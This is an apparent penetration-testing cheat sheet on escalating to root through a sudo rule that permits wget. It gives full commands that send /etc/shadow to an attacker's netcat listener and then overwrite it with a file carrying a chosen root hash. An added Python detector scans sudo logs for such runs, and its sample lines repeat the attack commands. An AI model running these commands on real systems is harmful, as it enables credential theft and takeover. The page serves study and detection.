Sudo Wget Privilege Escalation

A sudoers rule that lets a user run "wget" as root may allow privilege escalation (PrivEsc).


Last updated 1 year ago

Investigation

sudo -l

(root) NOPASSWD: /usr/bin/wget

If we can execute "wget" as root, we may be able to escalate privileges.

Modify /etc/shadow

Get the contents of "/etc/shadow", generate a new password hash, set it in a copy of the shadow file, then upload that copy to the target. That changes the root password.

1. Get the Content of /etc/shadow

To see the content of /etc/shadow, we can use a netcat listener. First, start a listener on the local machine.

nc -lvnp 4444

On the target machine, send the contents of "/etc/shadow" to the local machine using the following command.

sudo /usr/bin/wget --post-file=/etc/shadow <local-ip>:4444

We should see the content on our local machine in the netcat listener. Copy the content.

2. Create a New Shadow File

Create a new shadow file on the local machine. This file will be written to the target's /etc/shadow later.

vim shadow.txt

In the vim editor (or nano, vi, etc.), paste the content of /etc/shadow that we copied in the previous section.

3. Create a New Root User Password and Add to Shadow File

Generate a new password hash for the root user on the local machine.

# -6: SHA512
openssl passwd -6 -salt 'salt' 'password'

Copy the generated hash and paste it into the password field of the root user in "shadow.txt". As a result, the contents of "shadow.txt" should look like this:

root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::
...

4. Transfer the Content of the Shadow File

To put shadow.txt onto the target machine, start a web server to host the file.

python3 -m http.server 8000

On the target machine, download this file to /etc/shadow. To do that, we need to run wget as root.

sudo /usr/bin/wget http://<local-ip>:8000/shadow.txt -O /etc/shadow

Finally, we can switch to the root user with the password we've created.

su root
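
Both wget invocations above go through sudo, so they appear in sudo's log. The following is an added detection example, not part of the original page: it parses sudo's default syslog line format and flags root wget runs whose --post-file or -O/--output-document argument resolves into a sensitive tree, going slightly beyond the page by also handling abbreviated long options and paths relative to the logged PWD. The SENSITIVE list, function names and sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
# sudo's syslog record: "<user> : TTY=... ; PWD=<dir> ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?PWD=(?P<pwd>\S+) ; "
                     r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
# Assumed watch list: trees an unprivileged user should not read or replace.
SENSITIVE = ("/etc/", "/root/", "/var/spool/cron/")

def is_long(arg, full, minimum):
    """Match a long option, including getopt_long's unambiguous abbreviations."""
    name = arg.split("=", 1)[0]
    return name.startswith(minimum) and full.startswith(name)

def wget_file_args(argv):
    """Return (read_paths, write_paths) named by wget's file options."""
    reads, writes = [], []
    it = iter(argv[1:])
    for arg in it:
        if is_long(arg, "--post-file", "--post-f"):
            reads.append(arg.split("=", 1)[1] if "=" in arg else next(it, ""))
        elif is_long(arg, "--output-document", "--output-d"):
            writes.append(arg.split("=", 1)[1] if "=" in arg else next(it, ""))
        elif re.match(r"-[^-O]*O", arg):  # -O file, -Ofile, bundled -qO file
            writes.append(arg.split("O", 1)[1] or next(it, ""))
    return reads, writes

def audit(lines):
    """Yield (user, action, path) for root wget runs touching SENSITIVE trees."""
    for line in lines:
        m = SUDO_RE.search(line)
        argv = m["cmd"].split() if m and m["runas"] == "root" else []  # args are space-joined
        if not argv or posixpath.basename(argv[0]) != "wget":
            continue
        reads, writes = wget_file_args(argv)
        for action, paths in (("read", reads), ("write", writes)):
            for p in paths:
                # resolve relative and ../ paths against the logged working directory
                full = posixpath.normpath(posixpath.join(m["pwd"], p))
                if full.startswith(SENSITIVE):
                    yield m["user"], action, full

# Constructed sample log lines (host, users and addresses are made up).
SAMPLE = [
    "Mar  3 10:15:02 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/wget --post-file=/etc/shadow 192.0.2.10:4444",
    "Mar  3 10:21:40 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/wget http://192.0.2.10:8000/shadow.txt -O /etc/shadow",
    "Mar  3 10:30:11 web01 sudo:    bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget https://example.org/pkg.tar.gz",
]

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

Detection only covers what already happened; the underlying fix is to remove the unrestricted NOPASSWD wget rule from sudoers.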
